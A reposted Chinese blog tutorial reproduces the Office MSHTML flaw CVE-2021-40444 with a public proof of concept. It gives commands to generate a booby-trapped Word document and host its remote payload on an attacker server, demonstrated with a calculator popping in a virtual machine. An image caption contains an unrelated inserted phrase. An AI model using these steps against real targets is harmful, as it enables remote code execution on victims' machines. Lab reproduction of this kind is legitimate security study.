本文的標(biāo)題是《2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)》來源于:由作者:陳鵬羽采編而成,主要講述了項(xiàng)目地址在https://github.com/lo
項(xiàng)目地址在https://github.com/lockedbyte/CVE-2021-40444。先下載到kali里。
由于此項(xiàng)目必須使用lcab,所以我們先在kail里安裝一下。
wget http://ftp.debian.org/debian/pool/main/l/lcab/lcab_1.0b12.orig.tar.gz
tar zxvf lcab_1.0b12.orig.tar.gz
cd lcab-1.0b12
./configure
make
sudo make install
which lcab
# 查看幫助信息
lcab –help
進(jìn)入下載后的CVE-2021-40444目錄里,執(zhí)行:
python3 exploit.py generate test/calc.dll http://<SRV IP>:3333
看見“You can execute now the server and then send document.docx to target” 說明就可以了。
然后用python開一個(gè)http服務(wù),端口用剛剛設(shè)置的3333 或者自己設(shè)置的端口號(hào)。
sudo python3 exploit.py host 3333
把CVE-2021-40444目錄里的子目錄out下的document.docx文件copy到虛擬機(jī)中執(zhí)行。
word打開后,可以看見這里在下載我們kali上的html文件。
html又會(huì)下載calc.cab 文件執(zhí)行其中的命令,最后彈出計(jì)算器。
服務(wù)端顯示的結(jié)果:
現(xiàn).jpg "2021年的word文檔還有漏洞,Office 1day CVE-2021-40444復(fù)現(xiàn)(2021年的微博之夜的king和queen是誰)插圖18")
本文原作者為陳鵬羽,轉(zhuǎn)載請(qǐng)注明:出處!如該文有不妥之處,請(qǐng)聯(lián)系站長刪除,謝謝合作~
原創(chuàng)文章,作者:陳鵬羽,如若轉(zhuǎn)載,請(qǐng)注明出處:http://m.uuuxu.com/20220512315602.html
相關(guān)推薦
-
如何使用“導(dǎo)航”窗格快速了解Word2013文檔的結(jié)構(gòu)和略縮圖(如何使用導(dǎo)航窗格)
Word 2013提供了一個(gè)“導(dǎo)航”
-
微信頭像黑白滄桑感(微信頭像悲哀黑白)
前沿拓展: 微信頭像黑白滄桑感 微信頭像變黑白的原因是: 1、圖片數(shù)據(jù)大,接收時(shí)間長:為了提升用戶體驗(yàn),微信會(huì)先將緩沖好的文字信息展現(xiàn)給用戶,圖片默認(rèn)先顯示灰色,接收完成后才顯…
-
如何[設(shè)定個(gè)人化網(wǎng)站]中之Office 365個(gè)人化網(wǎng)站導(dǎo)覽連結(jié)(如何設(shè)定個(gè)人成功目標(biāo))
在使用Office 365時(shí),在頁面的「我的網(wǎng)站」中可以看到
-
export 3ds max to sketchup
如何在SketchUp中打開和編輯已導(dǎo)入的3d**ax文件 在SketchUp中打開和編輯已導(dǎo)入的3d**ax文件是一項(xiàng)很有用的技能。你需要將3d**ax文件導(dǎo)出為一個(gè)支持在Ske…
-
Office 2013中墨跡書寫工具的啟用方法
墨跡書寫工具這個(gè)東西不知道是否有人需要使用,就是像 PPT
-
Office365訂閱到期后用戶數(shù)據(jù)還會(huì)保留嗎?(office365郵箱登陸)
很多已經(jīng)訂閱或訂閱過Office 365的用戶都有一個(gè)疑問:
-
Word2013文檔中只給文字添加下劃線的方法(word2013中按ctrl+n組合鍵可創(chuàng)建一個(gè)新的空白文檔)
在Word 2013的“開始”選項(xiàng)卡
-
如何使用3d**axQuadDraw優(yōu)化建模流程
如何使用3d**axQuadDraw優(yōu)化建模流程 3d**axQuadDraw是一款非常實(shí)用的建模工具,可以大大優(yōu)化建模流程。使用QuadDraw工具,在建立連續(xù)型拓?fù)浣Y(jié)構(gòu)時(shí)相當(dāng)方…
-
怎么恢復(fù)微信聊天記錄
前沿拓展: 怎么恢復(fù)微信聊天記錄 微信中聊天記錄刪除恢復(fù)可以分為兩種,一種是自主**作刪除的,是無法恢復(fù)找回的,一種是被系統(tǒng)誤刪,可以通過以下方法修復(fù)找回: 工具:iPhone 8…
-
追逐我們的星辰大海:2021年總結(jié)(追逐我們的星辰大海)
本文的標(biāo)題是《追逐我們的星辰大海:2021年總結(jié)》來源于:由作者:陳思漫采編而成,主要講述了編輯導(dǎo)語:到了年尾,是時(shí)候開始對(duì)2021這一年來的工作進(jìn)行總體復(fù)盤了。在這一年中,你獲得了哪些經(jīng)驗(yàn)或教訓(xùn)?達(dá)